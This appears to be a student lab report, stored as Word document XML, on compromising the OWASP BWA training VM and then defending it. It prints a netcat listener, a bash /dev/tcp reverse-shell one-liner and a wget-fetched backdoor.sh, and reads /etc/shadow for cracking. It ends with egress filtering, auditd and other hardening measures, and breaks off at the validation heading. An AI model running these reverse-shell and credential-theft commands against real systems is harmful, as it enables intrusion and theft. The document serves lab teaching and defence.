          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3920400" cy="2106000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212578577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0400" cy="210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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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Experimental Report: OWASP BWA Vulnerability Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.tj8eoet1frld" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I.Experiment Objectives and Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Objective:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Exploit known vulnerabilities to compromise the target host (OWASP BWA), establish a reverse shell, escalate privileges, and collect sensitive information to validate the existence of system weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Environment Setup:</w:t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Attacker host (Kali Linux):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192.168.56.111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Target host (OWASP BWA):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192.168.56.105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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.we29s2mvwzrh" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">II. Reverse Shell Establishment Process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081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Kali starts Netcat listener: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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082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OWASP sends reverse shell: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bash -i &gt;&amp; /dev/tcp/192.168.56.111/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Result: Kali successfully receives reverse connection and gains root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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III. Target System Reconnaissance and Privilege Verification</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="97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05"/>
        <w:gridCol w:w="2535"/>
        <w:gridCol w:w="5010"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2205"/>
            <w:gridCol w:w="2535"/>
            <w:gridCol w:w="5010"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="1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jc w:val="center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Command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jc w:val="center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jc w:val="center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Result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uname -a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View kernel &amp; system info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Linux owaspbwa 2.6.32-25-generic-pae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whoami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Check current user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root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Query UID and groups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uid=0(root) gid=0(root)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ls /home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Check home directory users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Found user “user”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cat /etc/passwd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Retrieve system account list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Readable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cat /etc/shadow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Password hash data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Successfully read, usable for cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A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IV. Web Directory and Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="97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780"/>
        <w:gridCol w:w="1635"/>
        <w:gridCol w:w="4335"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3780"/>
            <w:gridCol w:w="1635"/>
            <w:gridCol w:w="4335"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="1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jc w:val="center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Command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jc w:val="center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jc w:val="center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Result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ls -l /var/www/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List web root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Contains bwapp, webgoat, wivet platforms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ls /var/www/html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Check common dir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Directory does not exist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cat /var/www/html/index.php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Attempt read homepage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No readable data (dir not found)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8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2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.25pvxdqzvkbf" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">V. Network Services and Lateral Movement Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.t3uoz97qh2m2" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check open network services: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netstat -tulnp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.tbk2pxgcf469" w:id="5"/>
      <w:bookmarkEnd w:id="5"/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Results:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC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Port 80: Apache2</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD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Port 443: HTTPS</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE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Port 22: SSH</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF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Port 3306: MySQL</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0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Port 5432: PostgreSQL</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1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Other: Java, Samba, nmbd, etc.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2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Query local subnet info (ARP):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arp -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Detected:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4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192.168.56.111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 (Kali)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5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192.168.56.1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 (Default gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.qk89h6wu1nhq" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VI. Achievements and Potential Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Successfully completed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8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Reverse shell established with root privileges.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9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Retrieved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/etc/shadow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 password hashes (for offline cracking).</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA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Enumerated system version, users, home directories, and services.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB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Detected open services and active network connections.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="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Executed and modified files (e.g., deployed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backdoor.sh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BD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Supplementary Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="24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Backdoor script (backdoor.sh):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0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bash -i &gt;&amp; /dev/tcp/192.168.56.111/4444 0&gt;&amp;1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Privilege Escalation:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Not required — target web server was already running as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2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Observation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3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The user executing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wget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+x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./backdoor.sh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 was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root@owaspbwa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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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After execution, connection returned to Kali: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connect to [192.168.56.111] from (UNKNOWN) [192.168.56.105] 47340</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5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root@owaspbwa:~#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="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 → Indicates reverse shell started directly with root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.uglhc8qg9fv" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VII. Defense Perspectives – Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Theme: From Penetration to Defense → Reverse Shell → Backdoor → Privilege Escalation → Detection &amp; Blocking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="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3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.t9ajpokyqqxr" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Blocking Backdoor Transmission and Execution</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="95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735"/>
        <w:gridCol w:w="5850"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3735"/>
            <w:gridCol w:w="585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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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Defense Measure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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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ind w:left="720" w:hanging="360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Egress Filtering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ind w:left="720" w:hanging="360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Restrict outbound connections; only allow ports 80/443; block dangerous ports (e.g., 4444):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ind w:left="720" w:hanging="360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sudo iptables -A OUTPUT -p tcp --dport 4444 -j REJECT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ind w:left="720" w:hanging="360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ind w:left="720" w:hanging="360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Block Bash TCP Reverse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ind w:left="720" w:hanging="360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Use AppArmor/SELinux to forbid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/dev/tcp</w:t>
            </w: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; recompile Bash without support.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ind w:left="720" w:hanging="360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Remove Reverse Shell Tools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ind w:left="720" w:hanging="360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Delete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wget</w:t>
            </w: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curl</w:t>
            </w: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nc</w:t>
            </w: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 to reduce exploitation; sandbox with Firejail.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ind w:left="720" w:hanging="360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noexec mount directories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ind w:left="720" w:hanging="360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Prevent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/tmp</w:t>
            </w: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/uploads</w:t>
            </w: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 from executing files:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="9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ind w:left="720" w:hanging="360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tmpfs /tmp tmpfs defaults,noexec,nosuid 0 0</w:t>
            </w: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 in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/etc/fstab</w:t>
            </w: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ind w:left="720" w:hanging="360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9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.qzvufbw6v7l3" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Account and Password Management</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="95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10"/>
        <w:gridCol w:w="6375"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3210"/>
            <w:gridCol w:w="63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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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Defense Measure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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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ind w:left="720" w:hanging="360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Strengthen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/etc/shadow</w:t>
            </w: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 permissions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ind w:left="720" w:hanging="360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Ensure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chmod 640 root:shadow</w:t>
            </w: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ind w:left="720" w:hanging="360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Disable root SSH login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ind w:left="720" w:hanging="360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Edit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/etc/ssh/sshd_config</w:t>
            </w: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PermitRootLogin no</w:t>
            </w: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ind w:left="720" w:hanging="360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Secure sudo settings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ind w:left="720" w:hanging="360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Restrict allowed commands, enforce password policy &amp; 2FA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.f0xmvajkdfh0" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Enable Logging and Intrusion Detection (IDS/IPS)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>
        <w:tblW w:w="97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535"/>
        <w:gridCol w:w="4200"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="5535"/>
            <w:gridCol w:w="420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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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Defense Measure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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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ind w:left="720" w:hanging="360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auditd auditing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ind w:left="720" w:hanging="360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Track system calls/file changes:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="7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ind w:left="720" w:hanging="360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auditctl -a always,exit -F arch=b64 -S execve -k suspicious-exec</w:t>
            </w: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ind w:left="720" w:hanging="360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ind w:left="720" w:hanging="360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fail2ban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ind w:left="720" w:hanging="360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Block IP after 5 failed SSH attempts (10 min ban).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ind w:left="720" w:hanging="360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Centralized logging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ind w:left="720" w:hanging="360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Combine rsyslog + logwatch or Wazuh/OSSEC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.lxhu0v6ik5np" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Backdoor and Anomaly Detection</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:tblW w:w="830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936.5603703007846"/>
        <w:gridCol w:w="4368.951440722839"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3936.5603703007846"/>
            <w:gridCol w:w="4368.951440722839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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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Defense Measure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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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ind w:left="720" w:hanging="360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Scan backdoor startup points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ind w:left="720" w:hanging="360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~/.bashrc</w:t>
            </w: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, cron, rc.local, systemd services.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ind w:left="720" w:hanging="360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Monitor suspicious processes/connections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ind w:left="720" w:hanging="360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Use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ps aux</w:t>
            </w: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netstat -tulnp</w:t>
            </w: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lsof -i</w:t>
            </w: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ind w:left="720" w:hanging="360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File integrity check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ind w:left="720" w:hanging="360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Use Tripwire to compare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/etc/passwd</w:t>
            </w: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/bin/bash</w:t>
            </w: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F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.lyz9f2t0hud6" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VIII. Defense Validation</w:t>
      </w:r>
    </w:p>
